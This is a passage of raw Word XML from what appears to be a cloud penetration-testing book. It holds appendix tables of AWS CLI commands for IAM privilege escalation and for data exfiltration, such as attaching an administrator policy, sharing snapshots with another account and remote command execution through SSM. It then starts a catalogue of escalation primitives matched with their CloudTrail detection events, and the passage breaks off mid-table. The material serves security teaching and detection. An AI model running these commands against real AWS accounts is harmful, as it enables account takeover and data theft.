    <w:p w14:paraId="72F98B31" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:vanish/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7054"/>
        <w:gridCol w:w="895"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="28CCA40D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A5DBA9A"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A.3 — Privilege escalation and lateral movement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7469AF63" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DBE5519"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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19D379C6"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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60F364AA"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Chapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="528903C4" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="157A5CC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Privesc scan (Pacu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12471DC9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>run iam__privesc_scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4E5E6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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7100FEDF" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D62485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Create access key on user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E7D74FC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws iam create-access-key --user-name X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DFDE9D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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="6A797E48" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E3EB76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Attach admin policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="570FF211" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws iam attach-user-policy --user-name X --policy-arn arn:aws:iam::aws:policy/AdministratorAccess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19C660B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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="548340D8" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51EE91A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Update role trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4855C8E5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws iam update-assume-role-policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E08D94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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="1718E4A6" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A5B7B1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PassRole to Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="328D9B96" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws lambda update-function-configuration --role X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D96A3D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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="58A1BB3E" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="310870E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Role chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE0E58D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws sts assume-role --role-arn X --role-session-name Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD3279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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F992425" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:vanish/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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6958"/>
        <w:gridCol w:w="895"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="19501168" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="410C8B7D"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A.4 — Exfiltration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="2EFA9EED" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FB871D6"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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51F3FB47"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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17FBB926"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Chapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="16F36482" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FAFC5C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EBS snapshot share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75447CA0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws ec2 modify-snapshot-attribute --snapshot-id X --create-volume-permission Add=[{UserId=Y}]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F6DEB9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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3A9BE1E9" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12639D9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RDS snapshot share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12A1F6A3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws rds modify-db-snapshot-attribute --db-snapshot-identifier X --attribute-name restore --values-to-add Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A7F8EF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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="026AF192" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0936752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DynamoDB export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0937F910" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws dynamodb export-table-to-point-in-time --table-arn X --s3-bucket Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="435A834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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="29B61490" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BC2190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Redshift UNLOAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4047C53E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UNLOAD ('SELECT ...') TO 's3://X/' IAM_ROLE 'arn:...' FORMAT PARQUET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C66AAE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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="5FEB9133" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="493FB33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Athena CTAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BCA9208" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE TABLE exfil WITH (external_location='s3://X/') AS SELECT ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="155102F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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="717F4887" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B2E38B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 replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67422FCC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws s3api put-bucket-replication --bucket X --replication-configuration file://repl.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7130A03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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="46E104BA" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B0E484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SSM RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DF76831" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws ssm send-command --targets ... --document-name AWS-RunShellScript --parameters 'commands=[...]'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0764F39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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="417F217F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Appendix B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>IAM Privilege Escalation Primitive Catalogue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4534DB61"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Consolidated list of the privilege-escalation primitives introduced in Chapter 8 and used throughout the book. Ordered alphabetically by the primary IAM action; each entry states the required action(s), the prerequisite conditions, the resulting capability, and the CloudTrail event that betrays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2115"/>
        <w:gridCol w:w="1673"/>
        <w:gridCol w:w="3435"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="46485669" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17D0F4B4"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B.1 — Privilege-escalation primitive reference.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="4C2AF158" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6027DCC0"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Primary action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="744C8D16"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Prerequisite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37CD6EF1"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Gain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F25E765"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CloudTrail event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="55E06AA7" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2679AD23" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>codebuild:UpdateProject</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:PassRole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24F3EE5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project + role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D0B0BD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RCE under project role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BD14211" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateProject</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
